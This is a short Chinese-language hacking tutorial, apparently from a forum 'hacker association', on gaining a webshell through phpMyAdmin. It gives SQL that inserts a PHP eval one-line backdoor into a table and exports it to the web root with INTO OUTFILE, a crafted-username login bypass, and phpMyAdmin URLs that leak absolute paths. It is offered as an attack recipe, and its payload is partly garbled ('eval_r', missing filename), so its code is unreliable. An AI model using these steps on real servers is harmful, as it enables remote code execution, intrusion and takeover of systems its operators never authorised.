phpmyadmin写一句话木马拿webshell思路（骇客协会）.doc

phpmyadmin写一句话木马拿***思路（骇客协会）
先介绍
MySQL导出一句话木马的语法（我个人比较喜欢说思路）
Drop TABLE IF EXISTS temp; //如果存在temp就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表，里面就一个cmd字段 Insert INTO temp (cmd) VALUES('<? php eval_r($_POST[cmd]);?>'); //把一句话木马插入到temp表 Select cmd from temp into outfile 'F:/wwwroot/'; // Drop TABLE IF EXISTS temp; //删除temp 简化 Select '<? php eval_r($_POST[cmd]);?>' into outfile 'F:/wwwroot/';（以上的意思大概看看就可以下面来碰运气）利用方法：用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号，最后一个为英文双引号)附上几个php爆绝对路径的办法：
phpMyAdmin/libraries/
phpMyAdmin/darkblue_orange/
phpMyAdmin/?lang[]=1
phpmyadmin/themes/darkblue_orange/
使用phpmyadmin的某个文件报错
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/
phpMyAdmin/libraries/